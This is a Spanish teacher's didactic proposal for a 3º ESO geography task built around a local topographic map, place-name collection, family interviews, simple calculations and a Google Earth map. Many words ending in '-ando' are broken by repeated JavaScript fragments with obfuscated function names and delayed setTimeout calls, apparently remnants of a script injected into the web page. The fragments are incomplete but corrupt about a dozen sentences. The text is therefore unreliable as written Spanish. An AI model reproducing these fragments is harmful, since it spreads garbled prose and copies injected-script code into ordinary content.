EL MAPA TOPOGRÁFICO: UN BUEN RECURSO PARA TRABAJAR LAS COMPETENCIAS.

Autora: Fermina Acevedo Padilla

Bajo el título El topográfico: un buen recurso para trabajar las competencias presentamos una propuesta didáctica categorizada como tarea, que permite desarrollar  todas las competencias básicas y repasar a la par gran parte de los contenidos trabajados durante todo el curso por el alumnado de 3º ESO en la materia de Ciencias Sociales. Precisa para su ejecución de ocho sesiones y se encuadra en la recta final del curso.

Introducción

El creciente poder del conocimiento en las sociedades desarrollas y la necesaria convergencia educativa europea, nos llevan a plantearnos nuevos modos de organizar y concebir la práctica docente, es decir, adoptar las Competencias Básicas como elementos primordiales de nuestras programaciones, pues son aprendizajes imprescindibles e integradores, que permiten aplicar los saberes adquiridos en diferentes situaciones.

Considerandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando ambos factores, presentamos esta propuesta didáctica que ilustra cómo integrar las competencias básicas en la vida real de un aula en el que se trabaja la Geografía de 3º de ESO.

Proponemos una atractiva tarea que partiendo de un mapa topográfico, permite, no sólo, sintetizar y aplicar gran parte de los contenidos establecidos por el Decreto 83/2007 para dicho curso, sino  reforzar y evaluar las competencias básicas trabajadas durante todo el año, fomentandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el conocimiento del entorno escolar, involucrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a las familias, y compilandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando información de interés social.

Antes de desgranar los ejercicios y las actividades que conforman esta tarea, es preciso hacer algunas aclaraciones y puntualizaciones sobre las competencias básicas. Posteriormente estableceremos los objetivos, las competencias básicas, los contenidos, la metodología, los criterios de evaluación  y los pormenores de esta tarea.

1.- Punto de partida: Las competencias.

Las competencias son un elemento novedoso[1], implantadas por la LOE siguiendo las recomendaciones de la Comisión Europea de Educación, con la intención de crear un marco educativo común. Y a la par, garantizar que los jóvenes, al finalizar la ESO, puedan incorporarse de manera satisfactoria a la vida adulta y activa, siendo capaces de desarrollar aprendizajes a lo largo de la vida.  De ahí que Escamillas (2008)  las definan como: “capacidades relacionadas con el saber hacer, una dimensión que contempla lo teórico, lo comprensivo, lo práctico y la actitud”. Por su complejidad se erige como un elemento de formación al que hay que acercarse de  manera convergente (desde distintas materias) y gradual (en distintos momentos y diferentes situaciones de aprendizaje-cursos, etapas).

El carácter socializador e integrador de nuestra materia nos permite trabajar las ocho competencias[2], las cuales se adquieren mediante la resolución de tareas, aspecto en el que parecen coincidir todos los expertos.

Las competencias imponen una metodología que se articula en tres niveles, con los que tenemos que familiarizarnos, porque suelen generar equívocos entre los profanos.

Los ejercicios conforman la base, y son acciones de respuesta cerrada, perfectamente identificables, cuyo fin es comprobar el grado de adquisición de los conocimientos.

La actividad es una acción o conjunto de acciones  orientadas a la adquisición de algún conocimiento nuevo o a la utilización de algún conocimiento en una forma diferente. Suelen tener una respuesta abierta, que facilita la adquisición de nuevos conocimientos y prácticas/comportamientos.

En la cúspide, encontramos la tarea, acción o conjunto de acciones orientadas a la resolución de una situación-problema, dentro de un contexto definido, mediante la combinación de todos los saberes disponibles –aprendidos durante todo el curso- que permiten la elaboración de un producto relevante socialmente, tales como una exposición, un periódico escolar, una página web, un libro recopilatorio, etc.

Debemos concretar las claves de esta tarea estableciendo cuatro aspectos esenciales:

- El contexto o situación real en la que se va trabajar y mostrar los resultados.

- Los contenidos previos necesarios para comprender y ejecutar la tarea.

- Los recursos  necesarios.

- Las competencias que se van a adquirir o consolidar con la resolución de la tarea.

2.- LA TAREA DE FIN DE CURSO

Partiendo de los presupuestos constructivistas emprendemos el diseño de esta tarea  que consiste en analizar e interpretar un mapa topográfico del entorno más inmediato.

Como no podía ser menos, la planificación de la tarea es rigurosa e integradora, cobrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sentido todas y cada unas de las actividades y ejercicios propuestos, orientados a la aplicación de los saberes y competencias trabajadas durante el curso.

Además del pragmatismo obvio, la tarea tendrá gran relevancia en el entorno del alumnado, ya que permitirá censar un gran número de topónimos, no recogidos por la cartografía, y esenciales para entender el significado y la singularidad del parcelario.

La colaboración de la familia y del entorno en la recogida y ubicación de los topónimos  y la posterior edición de un texto y un mapa topográfico  virtual, garantizan la repercusión social que tiene que tener toda tarea.

En cuanto al contexto de aplicación está pensada para llevarla a cabo en un instituto de enseñanza secundaria enclavado en el mundo rural, ya que los alumnos conocen bien el término municipal y aún más sus progenitores, pues viven de él.

2.1. Objetivos didácticos

  • Recapitular y aplicar gran parte de los contenidos de 3º ESO:
  • Fomentar el conocimiento del entorno educativo
  • Integrar las TICS como una fuente y medio de difusión de la información.
  • Implicar a las familias
  • Apostar por un nuevo modelo organizativo del proceso de enseñanza aprendizaje basado en las competencias.

2.2. Competencias básicas.

Con esta tarea pretendemos cerrar la programación de aula, por lo que trabajaremos todas las competencias básicas, de manera equilibrada, como veremos a continuación,  y lo que es más importante, podremos evaluar su dominio.

De manera concreta trabajarán la competencia:

  1. 1. Lingüística

-          Entrevistandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a agricultores y ganaderos para recopilar topónimos.

-          Tratandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando nueva información: “fuentes históricas” de donde extraer topónimos.

-          Sistematizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando los resultados de la tarea.

  1. 2. Aprender a aprender

-       Recogida de topónimos diferentes a los del topográfico nacional 1:10.000.

-       Búsqueda de textos históricos sobre el municipio.

  1. 3. Conocimiento e interacción con el medio.

-       Identificar las especies de fauna y flora predominantes en el paisaje con la ayuda de la familia y compararlas, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando sea posible, con las del topográfico.

-       Determinar la modificación y las causas de la alteración del paisaje. (mediante entrevistas)

  1. 4. Matemática

-       Cálculo matemático de la extensión del  poblamiento

-       Cálculo matemático de la extensión del término municipal.

-       Cálculo de la altitud media.

-       Densidad demográfica

  1. 5. Competencia cultural y artística

-       Catalogación de monumentos de arquitectura rural como las buhardas, cortijos singulares, sitios pintorescos, …

  1. 6. Social y ciudadana

-       Determinar las prácticas agropecuarias respetuosas con el medio.

-       Condenar el aprovechamiento poco sostenible del entorno.

  1. 7. TICS

-       Emplear las tics como medio de información.

-       Utilizar las Tics para representar recoger –base de datos-, mostrar –presentaciones  y sintetizar gráficamente (Google Earth) los datos obtenidos.

  1. 8. Autonomía e iniciativa personal

-       La necesaria para afrontar este trabajo tutelado, en el que cabe todo tipo de manifestaciones e iniciativas personales vinculadas con el asunto abordado.

2.3. Contenidos

Los contenidos que trabajaremos son los necesarios para la resolución de los diferentes ejercicios y tareas, que permitían trabajar las  competencias básicas anteriormente citadas. Concretandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando un poco, serán los siguientes:

  • Las formas del relieve
  • La estructura del espacio agrario y los diferentes tipos de aprovechamiento
  • Los suelos, la fauna y la flora
  • La tipología de poblamiento
  • La jerarquía de las redes viarias y agropecuarias
  • La simbología cartográfica
  • La denominación  de las parcelas, tipos y significado (aspecto nuevo)
  • La orientación
  • Lectura e interpretación de un mapa cartográfico
  • Curiosidad y búsqueda de información.

2.4. Metodología

La metodología que dará vida a esta tarea sigue los preceptos constructivistas así como las orientaciones establecidas  en la LOE y en Decreto extremeño 83/2007.  Atendiendo a las mismas planteamos una metodología que será  intencional, sistemática  y planificada, a la par que activa, participativa e integradora; capaz de dar respuesta en todo momento a las necesidades y maneras de aprender de todos y cada uno de los alumnos. Además fomentará la comprensión del entorno en el que vivimos, partiendo de los conocimientos previos, tanto los adquiridos durante el curso, como aquellos asimilados naturalmente en el entorno.

La labor docente se asienta sobre los siguientes pilares pedagógicos:

-          Consideración de los conocimientos previos, para así promover la adquisición de aprendizajes funcionales y significativos, así como el desarrollo de la necesaria autonomía y socialización.

-          Siendo el docente guía del proceso y mediador, para estimular el aprendizaje autónomo y dar respuesta a la diversidad..

-          Impulsaremos un estilo de evaluación que sirva como punto de referencia a nuestra actuación pedagógica, que proporcione al alumno información sobre su proceso de aprendizaje y  le permita la participar en el mismo a través de la autoevaluación y la coevaluación. Así se sentirán protagonistas de sus logros.

-          Por último procuraremos dar un enfoque multidisciplinar a la tarea, exhibiendo los resultados y recurriendo a otros departamentos para solventar aspectos concretos y pertinentes: nombre de una planta, los tipos de cabidas de terrenos, ….

Con la utilización de estrategias participativas pretendemos que el alumno se convierta en el protagonista de su propio aprendizaje, que además de significativo, el aprendizaje sea motivador, por su cercanía, quebrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la apatía manifiesta ante temas geográficos. Para ello planteamos una variada gama de actividades fundamentalmente individuales, que evidencia el grado de autonomía y de aprender a aprender, para después, apostar por la socialización, para valorar y comparar los resultados del trabajo. Y con las de indagación  les hacemos trabajar con nuevas fuentes e informaciones.

La exposición clásica es nuestra última estrategia, que tendrá una especial importancia  al inicio y al final de la tarea, al plantear los contenidos y la forma de trabajarlos, así como para poner el broche final.

Otra práctica metodológica importante será el fomento de la lectura. Tendrán los alumnos que manejar fuentes históricas o historiográficas del pueblo: Madoz, la Real Audiencia, artículos de monográficos locales, …. En la misma tónica le proporcionaremos una bibliografía y webgrafía de apoyo para ampliar  los contenidos.

Además del compromiso pleno del docente realizar cuantos cambios sean precisos para mejorar los resultados del proceso de enseñanza/aprendizaje para lo que realizaremos autoevaluación, y evaluaciones del proceso por parte del alumnado.

2.5. Recursos

Aplicaciones informáticas: presentaciones, base de datos, y google earth

Bibliografía histórica de la localidad

Formulario de entrevistas

Mapa topográfico

2.6. Temporalizarían y guión de desarrollo

Para el desarrollo de esta tarea necesitaremos entre ocho y diez sesiones de clases, repartidas durante un mes y medio de clase, es decir, que iremos planteandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el trabajo progresivamente, a la par que vamos trabajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las últimas unidades.

En la primera sesión presentaremos la tarea y les invitaremos a metarfosearse en topos, animándoles a dominar la tierra que pisan.

Seguidamente repasaremos los aspectos básicos para leer un topográfico, y se les entregará un mapa topográfico, dividido en aéreas o cuadriculas, de escala 1:10:000.

1ª Actividad:. A partir de material aportado, contestar a un cuestionario:

- ¿Qué es la toponimia? ¿ y los tipos de topónimos existentes (fitotopónimo, antropónimos, …)?

- Catalogar y explicar el topónimo de la localidad.

2 Actividad: Contabilizar los topónimos por áreas

En la segunda sesión, se corregirán las dos actividades y plantearemos otras nuevas para realizarlas en pareja, que tendrán que iniciar en el aula.

Corrección y planteamiento de dos nuevas actividades en parejas, para iniciarlas en el aula: en el primer caso y con ayuda del material (modelo de comentario): Descripción del relieve, la flora y el parcelario. Mientras que la segunda actividad implica poner en práctica su habilidad matemática para buscar datos y calcular la extensión del término municipal, del poblamiento, …

En la tercera sesión, toca corregir y plantear otras actividades.

Recordatorio sobre los tipos de trazados urbanos. Comentario del núcleo poblacional –desarrollo en clase y en parejas-.

A partir de la página INE (Instituto Nacional de Estadísticas) hacer un gráfico de la evolución de la población y calcular la densidad demográfica.

Comentario del grafico evolutivo de la población (1900-2010) relacionándolo con los recursos y el relieve descrito.

En la cuarta sesión, corregimos las actividades y confeccionamos entre todos una ficha para recoger los nuevos topónimos.

En la quinta sesión, a partir de unas nociones básicas y con la ayuda de un pequeño manual, comenzamos a sistematizar en una base de datos por areas las designaciones del parcelario.

La sexta sesión será dedicada a filtrar los datos de las diferentes bases de datos y a realizar un reparto de topónimos, para buscar su significado en diccionarios relativos a la materia como el de Nieto Ballester, Llorente, Alvar et Alli,…

En la séptima clase, daremos las pautas (caso del artículo) y las instrucciones (vertido en red) para que se inicie la sistematización de la información recopilada, para hacer un artículo destinado al libro de las fiestas,-han de hacer uno por alumno. El mejor será el publicado-, así como para confeccionar un mapa virtual, con  google earth (cada grupo de un área), donde se visualizarán todos los topónimos.

En la octava sesión, presentaremos los resultados en el aula e inauguraremos oficialmente un blog donde todo el mundo pueda ver el mapa topográfico virtual del pueblo.

Decíamos anteriormente que necesitaríamos entre ocho y diez sesiones. Las dos sesiones restantes son las que consideramos para solventar todo tipo de contrariedades que puedan surgir.

2.7. Criterio de Evaluación

Con estos seis criterios podremos evaluar el adquisición de las ocho competencias.

- Describir el relieve y la estructura del parcelario

- Calcular tasas de densidad demográfica, extensión de un término, …

- Recabar información y topónimos

- Sintetizar y compilar la información en un artículo, una base de datos, presentación.

- Contribuir a la elaboración de un mural.

- Valorar y proteger el medio natural y artístico del entorno

3.- CONCLUSIÓN.

Tras plantear los pormenores de esta propuesta didáctica, hemos de hacer algunas consideraciones finales:

  1. I.          Esta propuesta didáctica ha sido pensada para llevarla a cabo en dos centros educativos concretos, con un marcado carácter rural,  el IES Sierra Calera y el IESO Vicente Ferrer, de Santa Marta de los Barros y La Parra respectivamente. La selección de estos dos centros responde :

-          Al conocimiento que sobre la toponimia de este lugar poseemos.

-          A la dependencia económica de la tierra de gran parte de la comunidad educativa. Por lo que la tarea resulta cuanto menos atractiva y motivadora para el alumnado, ya que el nivel de estudios de los progenitores no va acondicionar notoriamente la contribución al trabajo.

  1. II.          La armonización de un gran número de los contenidos imprescindibles trabajados durante el curso, y ahora repartidos en actividades, ejercicios, hacen que esta tarea sea, con toda la modestia del mundo, ideal, ya que :

-          Permite trabajar todas las competencias

-          Promueve la colaboración del entorno socio-familiar en el inventariado de nombres de parajes.

-          Fomenta el conocimiento y el apego a la realidad educativa del centro.

-          Permite el desarrollo de aprendizajes autónomos y significativos, como consecuencia de pasar de la teoría a la práctica.

  1. III.          Una vertiente más ambiciosa de esta propuesta, que hemos obviado, y de la que nos gustaría dejar constancia, es la apuesta transdisciplinar, puesto que podrían colaborar en este proyecto los profesores de plástica (en la elaboración de “un mural topográfico”) y de informática. Y no sólo ellos, sino otros grupos de alumnos, los de primero de bachillerato de Latín, analizandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando los topónimos catalogados. Tarea que realizan con diccionarios específicos y que puede asumir el profesor, al ser un miembro más del equipo más.
  1. IV.          La relevancia del final de la tarea en el entorno. Divulgación de un articulo y  visualización virtual de topónimos en desuso,  ….

La conjunción de todos los conocimientos citados mostrará, sin lugar a dudas, el grado de competencias  del alumnado, y les enseñara a entender y valorar la tierra que pisan, ya que el hecho de bautizar las tierras del entorno forma parte de la manifestación más ancestral de posesión por parte del hombre. Conocer las  motivaciones que llevaron al hombre a elegirlos,  es  una forma más  para acercarnos al entorno, a sus pobladores y de entender nuestras señas de identidad.

BIBLIOGRAFÍA.

  • Escamilla González, A, Las competencias básicas. Claves y propuestas para el desarrollo en los centros. 2008
  • Nieto Ballester, E, Breve diccionario de topónimos españoles, Madrid 1997
  • Llorente, A, Toponimia e Historia, Granada 1989
  • Mapa topográfico Nacional  1:10.000 Hoja de Barcarrota.


[1] Aparece por primera vez reflejado en nuestro sistema normativo, y en relación a las enseñanzas obligatorias, en la Ley Orgánica de Educación de mayo de 2006, concretamente en sus artículos 6.1 y 6.2: “A lo dispuesto en esta Ley, se entiende por currículo el conjunto de objetivos, competencias básicas, contenidos, métodos pedagógicos y criterios de evaluación de cada una de las enseñanzas reguladas en la presente Ley” (6.1). “Con el fin de asegurar una formación común y garantizar la validez de los títulos correspondientes, el Gobierno fijará, en relación con los objetivos, competencias básicas, contenidos y criterios de evaluación, ..” (6.2)

[2] Las competencias básicas son: 1) comunicación lingüística;2) razonamiento matemático, 3)Conoci-9miento e interacción con el medio físico y natural; 4)Digital y tratamiento de la información, 5) Social y Ciudadana, 6)Cultural y artística, 7)Aprender a aprender e 8) Autonomía e iniciativa personal.

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